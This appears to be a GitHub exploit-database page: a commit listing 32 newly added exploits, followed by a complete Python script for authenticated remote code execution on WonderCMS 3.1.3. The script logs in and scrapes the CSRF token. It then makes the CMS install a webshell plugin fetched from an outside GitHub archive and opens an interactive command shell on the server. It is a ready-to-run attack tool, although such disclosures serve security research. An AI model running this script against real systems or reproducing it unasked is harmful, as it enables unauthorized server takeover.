0ffa4d35c4
32 changes to exploits/shellcodes aSc TimeTables 2021.6.2 - Denial of Service (PoC) IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path Microsoft Windows - Win32k Elevation of Privilege Ksix Zigbee Devices - Playback Protection Bypass (PoC) Mitel mitel-cs018 - Call Data Information Disclosure Expense Management System - 'description' Stored Cross Site Scripting ILIAS Learning Management System 4.3 - SSRF Pharmacy Store Management System 1.0 - 'id' SQL Injection Under Construction Page with CPanel 1.0 - SQL injection EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF Student Result Management System 1.0 - Authentication Bypass SQL Injection EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution WonderCMS 3.1.3 - Authenticated Remote Code Execution PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting NewsLister - Authenticated Persistent Cross-Site Scripting Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile DotCMS 20.11 - Stored Cross-Site Scripting WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass ChurchCRM 4.2.0 - CSV/Formula Injection ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS) Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover Simple College Website 1.0 - 'page' Local File Inclusion Car Rental Management System 1.0 - SQL Injection / Local File include WordPress Plugin Wp-FileManager 6.8 - RCE
103 lines
No EOL
3 KiB
Python
Executable file
103 lines
No EOL
3 KiB
Python
Executable file
# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution
|
|
# Date: 2020-11-27
|
|
# Exploit Author: zetc0de
|
|
# Vendor Homepage: https://www.wondercms.com/
|
|
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
|
|
# Version: 3.1.3
|
|
# Tested on: Ubuntu 16.04
|
|
# CVE : N/A
|
|
|
|
|
|
# WonderCMS is vulnerable to Authenticated Remote Code Execution.
|
|
# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
|
|
# Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE.
|
|
|
|
# python3 exploit.py http://wonder.com/loginURL GpIyq0RH
|
|
# -------------
|
|
# [+] Getting Token
|
|
# [+] Sending Payload
|
|
# [+] Get the shell
|
|
# [+] Enjoy!
|
|
# $id
|
|
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
|
|
import requests
|
|
import sys
|
|
import re
|
|
from bs4 import BeautifulSoup
|
|
from termcolor import colored
|
|
|
|
|
|
print(colored('''
|
|
|
|
\ \ /_ \ \ | _ \ __| _ \ __| \ | __|
|
|
\ \ \ /( |. | | |_| / ( |\/ |\__ \
|
|
\_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/
|
|
|
|
------[ Auth Remote Code Execution ]------
|
|
''',"blue"))
|
|
|
|
if len(sys.argv) != 3:
|
|
print(colored("[-] Usage : ./wonder.py loginURL password","red"))
|
|
exit()
|
|
|
|
loginURL = sys.argv[1]
|
|
password = sys.argv[2]
|
|
|
|
r = requests.session()
|
|
data = { "password" : password }
|
|
page = r.post(loginURL,data)
|
|
if "Wrong" in page.text:
|
|
print(colored("[!] Exploit Failed : Wrong Credential","red"))
|
|
exit()
|
|
|
|
print(colored("[+] Getting Token","blue"))
|
|
soup = BeautifulSoup(page.text, "html.parser")
|
|
|
|
allscript = soup.find_all("script")
|
|
no = 0
|
|
for i in allscript:
|
|
if "rootURL" in str(i):
|
|
url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
|
|
elif "token" in str(i):
|
|
token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
|
|
|
|
payload = "https://github.com/zetc0de/wonderplugin/archive/master.zip"
|
|
|
|
def sendPayload(req,url,payload,token):
|
|
getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
|
|
req.get(getShell)
|
|
shell = url + "plugins/wonderplugin/evil.php"
|
|
checkshell = req.get(shell)
|
|
if "1337" in checkshell.text:
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
print(colored("[+] Sending Payload","blue"))
|
|
shell = sendPayload(r,url,payload,token)
|
|
|
|
|
|
if shell == True:
|
|
print(colored("[+] Get the shell","blue"))
|
|
print(colored("[+] Enjoy!","blue"))
|
|
shell = url + "plugins/wonderplugin/evil.php"
|
|
while True:
|
|
cmd = input("$")
|
|
data = { "cmd" : cmd }
|
|
|
|
res = r.post(shell,data)
|
|
if res.status_code == 200:
|
|
print(res.text)
|
|
elif shell == False:
|
|
print(colored("[+] Get the shell","blue"))
|
|
print(colored("[+] Enjoy!","blue"))
|
|
shell = url + "plugins/wonderplugin-master/evil.php"
|
|
while True:
|
|
cmd = input("$")
|
|
data = { "cmd" : cmd }
|
|
res = r.post(shell,data)
|
|
if res.status_code == 200:
|
|
print(res.text)
|
|
else:
|
|
print(colored("[!] Failed to exploit","red")) |